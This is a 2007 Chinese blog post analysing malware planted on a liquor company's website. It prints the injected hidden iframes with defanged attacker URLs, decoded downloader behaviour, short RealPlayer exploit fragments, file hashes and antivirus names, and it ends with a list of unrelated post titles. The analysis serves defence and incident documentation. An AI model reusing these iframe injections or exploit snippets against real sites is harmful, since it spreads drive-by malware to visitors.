巴马某神酒业有限责任公司网站被挂马Worm.Win32.Downloader/Trojan.Win32.Mnless
来源:互联网 发布:淘宝网司法公开拍卖 编辑:程序博客网 时间:2024/04/28 07:24
巴马某神酒业有限责任公司网站被挂马Worm.Win32.Downloader/Trojan.Win32.Mnless
endurer 原创
2007-12-13 第1版
检查首页代码,发现被多次加入代码:
/---
<ifame src=hxxp://A**A.ll*sging**.com/ww/new05.htm?075 widTh=1 naMe='6005' height=1></iframe>
<ifame src=hxxp://A**A.ll*sging**.com/ww/new05.htm?013 width=1 height=1></iframe>
<ifame src=hxxp://www.f**Oafa**u.infO/ms30.htm?823 width=1 Name='6016' height=1></ifraMe><ifame src=hxxp://A**A.ll*sging**.com/ww/new05.hTm?075 wIdth=1 name='6016' height=1></iframe>
---/
hxxp://A**A.ll*sging**.com/ww/new05.htm?075 包含代码:
/---
<ifame src=hxxp://A**A.ll*sging**.com/aa/haha.htm width=5 height=5></iframe>
<ifame src=hxxp://A**A.ll*sging**.com/aa/gege.htm width=5 height=5></iframe>
---/
hxxp://A**A.ll*sging**.com/ww/new05.htm?013 与 hxxp://A**A.ll*sging**.com/ww/new05.htm?075 相同。
hxxp://A**A.ll*sging**.com/aa/haha.htm 经2次解密得到原代码,功能是检查cookie变量OK,输出代码:
/---
<script src=hxxp://aa.ll*sging**.com/aa/11.js></script>
<script src=hxxp://aa.ll*sging**.com/aa/bb.js></script>
<ifame width='10' height='10' src='hxxp://A**A.ll*sging**.com/aa/bf.html'></iframe>
---/
利用暴风影音漏洞,及BaiduBar.Tool下载hxxp://down.ll*sging**.com/bb/bd.cab
文件说明符 : D:/test/bd.cab
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-12-10 23:45:22
修改时间 : 2007-12-10 23:45:30
访问时间 : 2007-12-10 0:0:0
大小 : 34045 字节 33.253 KB
MD5 : 67e8a38e7570de02ec1e3b0fec7ac9d9
SHA1: 9EF39949C850CFE8C03F76FA0DFC7EC3BD286254
CRC32: 888380b0
文件说明符 : D:/test/bd.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-11-27 5:8:28
修改时间 : 2007-11-27 5:8:28
访问时间 : 2007-12-10 0:0:0
大小 : 34837 字节 34.21 KB
MD5 : 865188f4f8583f4c0728553b04375261
SHA1: BF3B97AE81F49CAF96268EF4CFF5B96C1818EB88
CRC32: deed8b5c
Kaspersky 报为 Worm.Win32.Downloader.bi
瑞星 报为 Trojan.Win32.Mnless.znc》nspack
hxxp://A**A.ll*sging**.com/aa/11.js 经1次解密得到原代码,功能是下载hxxp://down.ll*sging**.com/bb/014.exe,保存为ntuser.com并运行。
文件说明符 : D:/test/014.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-12-10 23:42:45
修改时间 : 2007-12-10 23:42:46
访问时间 : 2007-12-10 0:0:0
大小 : 34854 字节 34.38 KB
MD5 : 19a5e9859be11640446fd3d7b6533d23
SHA1: 5B3A4028A4E85422ACAA3F7F974ECBB5D35E936B
CRC32: 57901cec
Kaspersky 报为 Worm.Win32.Downloader.bd
瑞星 报为 Backdoor.Win32.Agent.yos》nspack
hxxp://A**A.ll*sging**.com/aa/bb.js 为暴风影音漏洞利用代码。
hxxp://A**A.ll*sging**.com/aa/ppp.js 为PPStream漏洞利用代码。
hxxp://A**A.ll*sging**.com/aa/bf.html 为
联众ConnectAndEnterRoom ActiveX控件栈溢出漏洞代码。
可参考:
联众ConnectAndEnterRoom ActiveX控件栈溢出漏洞
http://www.nsfocus.net/vulndb/11122
hxxp://A**A.ll*sging**.com/aa/gege.htm 经2次解密得到原代码,为RealPlayer 漏洞利用代码,其中末段代码挺有意思:
/---
PayLoad+="YuanGe";Real.Import("c:\\Program Files\\NetMeeting\\TestSnd.wav",PayLoad,"",0,0)};RealExploit();)
---/
hxxp://www.f**Oafa**u.infO/ms30.htm?823 包含代码
/---
<HTML>
<ifame src="88/881.htm" width="20" height="0" frameborder="0"></iframe>
<ifame src="88/883.htm" width="1" height="1" frameborder="0"></iframe>
</HTML>
---/
hxxp://www.f**Oafa**u.infO/88/881.htm 利用MS06-014: msadco.dll 漏洞 下载hxxp://www.*6*8y**u*.cn/68down.exe,保存为C:/MicroSoft.pif,通过创建文件C:/MicroSoft.vbs来启动。代码中的一个变量名为:Qq784378237
文件说明符 : D:/test/68down.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-12-10 23:44:5
修改时间 : 2007-12-10 23:44:6
访问时间 : 2007-12-10 0:0:0
大小 : 31876 字节 31.132 KB
MD5 : 7f29c1dbaae355933130030aed699672
SHA1: 1A5EDE06B6CCD19BB7FB9AF3E9B0456E847BFDD0
CRC32: 2738d5ad
Kaspersky 报为 Worm.Win32.Downloader.cg
瑞星 报为 Trojan.Win32.Mnless.zyt
hxxp://www.f**Oafa**u.infO/88/883.htm 经2次解密得到原代码,同样为 RealPlayer 漏洞利用代码,其中末段代码与上面的不同:
/---
PayLoad += "ChuiZi";
Real.Import("c:\\Program Files\\NetMeeting\\TestSnd.wav", PayLoad,"", 0, 0);
}
RealExploit();)
---/
- 巴马某神酒业有限责任公司网站被挂马Worm.Win32.Downloader/Trojan.Win32.Mnless
- 某电力信息网挂马Worm.Win32.AutoRun,Trojan-Downloader.Win32.Losabel
- 某网站挂Trojan-Downloader.SWF.Small利用flash漏洞传播Trojan-Downloader.Win32.Small
- 某笑话网站挂马Trojan-Downloader.Win32.Agent.rub
- 某笑话网站挂马Trojan-Downloader.Win32.Agent.rub
- 某笑话网站挂马Trojan-Downloader.Win32.Agent.rub
- 某职业指导网被挂Trojan.Win32.KillAV,Trojan.PSW.Win32.QQPass,RootKit.Win32.Mnless等
- 某农业产品贸易网挂马Trojan.DL.Win32.Mnless.bes/Trojan-Dropper.Win32.Agent.xdu
- 某P2P视频软件论坛被挂马Trojan.DL.Win32.Mnless.rq
- X天科技有限公司网站挂马Trojan.DL.Win32.Mnless/Win32.Losabel
- 某市发改委网站被挂马 xzz.exe/Trojan-Downloader.Win32.Delf.aof
- 某健康学校网站被植入传播Trojan-Downloader.Win32.Delf.bho的代码
- 某文学论坛被挂马 Worm.Win32.Agent.ipi/Trojan.Win32.Agent.avt
- 某县农业网被挂马 Trojan.Win32.KillAV.bca/Trojan-Downloader.Win32.Geral.ix
- 某县农业网挂马Trojan-Downloader.Win32.ACVE.az等
- 某县农业信息网挂马RootKit.Win32.Mnless,Trojan.Win32.Edog等
- 木马程序 Trojan-Downloader.Win32.Agent.bbb
- 有关Trojan-Downloader.Win32.QQHelper.**文件删除
- 喝杯白酒,交个朋友
- 团队管理[转载]
- [解决方法]网络策略设置禁止您使用该网站获取您计算机的更新程序。 如果您确认此消息有误,请向您的系统管理员咨询。
- 由浅到深了解JavaScript类(转贴)
- asterisk的配置文档
- 巴马某神酒业有限责任公司网站被挂马Worm.Win32.Downloader/Trojan.Win32.Mnless
- Eclipse配置WEKA
- Jcreater配置WEKA
- SIP协议全方位概要介绍
- NetBeans配置WEKA
- WEKA编写新学习方案
- Flash与JSP留言版全部源码
- 写在工作元年年末
- 突然想创业